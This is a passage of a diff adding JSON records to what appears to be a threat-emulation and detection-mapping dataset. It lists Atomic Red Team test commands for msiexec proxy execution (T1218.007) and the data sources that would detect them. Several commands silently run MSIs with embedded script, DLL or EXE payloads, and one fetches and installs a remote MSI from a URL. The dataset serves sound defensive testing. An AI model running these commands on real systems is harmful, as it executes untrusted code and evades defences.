+ }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null + ] + }, + { + "technique_id": "T1218.007", + "command_list": [ + "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi\"\n", + "msiexec.exe /q /i \"#{msi_payload}\"\n", + "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi\"\n", + "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi\"\n", + "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi\"\n", + "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi' }\n", + "Invoke-CimMethod -ClassName Win32_Product -MethodName Install -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi' }\n", + "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi' }\n", + "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi' }\n", + "msiexec.exe /y \"PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll\"\n", + "msiexec.exe /z \"PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll\"\n", + "msiexec.exe /q /i \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi\"\n" + ], + "commands": [ + { + "command": "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /q /i \"#{msi_payload}\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /q /#{action} \"PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi' }\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName Install -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi' }\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi' }\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = 'PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi' }\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /y \"PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /z \"PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + }, + { + "command": "msiexec.exe /q /i \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi\"\n", + "source": "atomics/T1218.007/T1218.007.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Msiexec" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.007", + "display_name": "Signed Binary Proxy Execution: Msiexec", + "atomic_tests": [ + { + "name": "Msiexec.exe - Execute Local MSI file with embedded JScript", + "auto_generated_guid": "a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04", + "description": "Executes an MSI containing embedded JScript code using msiexec.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "i" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /q /#{action} \"#{msi_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Msiexec.exe - Execute Local MSI file with embedded VBScript", + "auto_generated_guid": "8d73c7b0-c2b1-4ac1-881a-4aa644f76064", + "description": "Executes an MSI containing embedded VBScript code using msiexec.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "i" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /q /#{action} \"#{msi_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Msiexec.exe - Execute Local MSI file with an embedded DLL", + "auto_generated_guid": "628fa796-76c5-44c3-93aa-b9d8214fd568", + "description": "Executes an MSI containing an embedded DLL using msiexec.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "i" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /q /#{action} \"#{msi_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Msiexec.exe - Execute Local MSI file with an embedded EXE", + "auto_generated_guid": "ed3fa08a-ca18-4009-973e-03d13014d0e8", + "description": "Executes an MSI containing an embedded EXE using msiexec.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "i" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /q /#{action} \"#{msi_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Win32_Product Class - Execute Local MSI file with embedded JScript", + "auto_generated_guid": "882082f0-27c6-4eec-a43c-9aa80bccdb30", + "description": "Executes an MSI containing embedded JScript code using the WMI Win32_Product class\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "Install" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "name": "powershell" + } + }, + { + "name": "WMI Win32_Product Class - Execute Local MSI file with embedded VBScript", + "auto_generated_guid": "cf470d9a-58e7-43e5-b0d2-805dffc05576", + "description": "Executes an MSI containing embedded VBScript code using the WMI Win32_Product class\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "Install" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "name": "powershell" + } + }, + { + "name": "WMI Win32_Product Class - Execute Local MSI file with an embedded DLL", + "auto_generated_guid": "32eb3861-30da-4993-897a-42737152f5f8", + "description": "Executes an MSI containing an embedded DLL using the WMI Win32_Product class\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "Install" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "name": "powershell" + } + }, + { + "name": "WMI Win32_Product Class - Execute Local MSI file with an embedded EXE", + "auto_generated_guid": "55080eb0-49ae-4f55-a440-4167b7974f79", + "description": "Executes an MSI containing an embedded EXE using the WMI Win32_Product class\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "Install" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "name": "powershell" + } + }, + { + "name": "Msiexec.exe - Execute the DllRegisterServer function of a DLL", + "auto_generated_guid": "0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d", + "description": "Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the \"src\" folder is only built for 64-bit, so this won't work on a 32-bit OS.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_payload": { + "description": "DLL to execute that has an implemented DllRegisterServer function", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The DLL must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /y \"#{dll_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Msiexec.exe - Execute the DllUnregisterServer function of a DLL", + "auto_generated_guid": "ab09ec85-4955-4f9c-b8e0-6851baf4d47f", + "description": "Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the \"src\" folder is only built for 64-bit, so this won't work on a 32-bit OS.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_payload": { + "description": "DLL to execute that has an implemented DllUnregisterServer function", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The DLL must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /z \"#{dll_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Msiexec.exe - Execute Remote MSI file", + "auto_generated_guid": "44a4bedf-ffe3-452e-bee4-6925ab125662", + "description": "Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "String", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi" + } + }, + "executor": { + "command": "msiexec.exe /q /i \"#{msi_payload}\"\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized 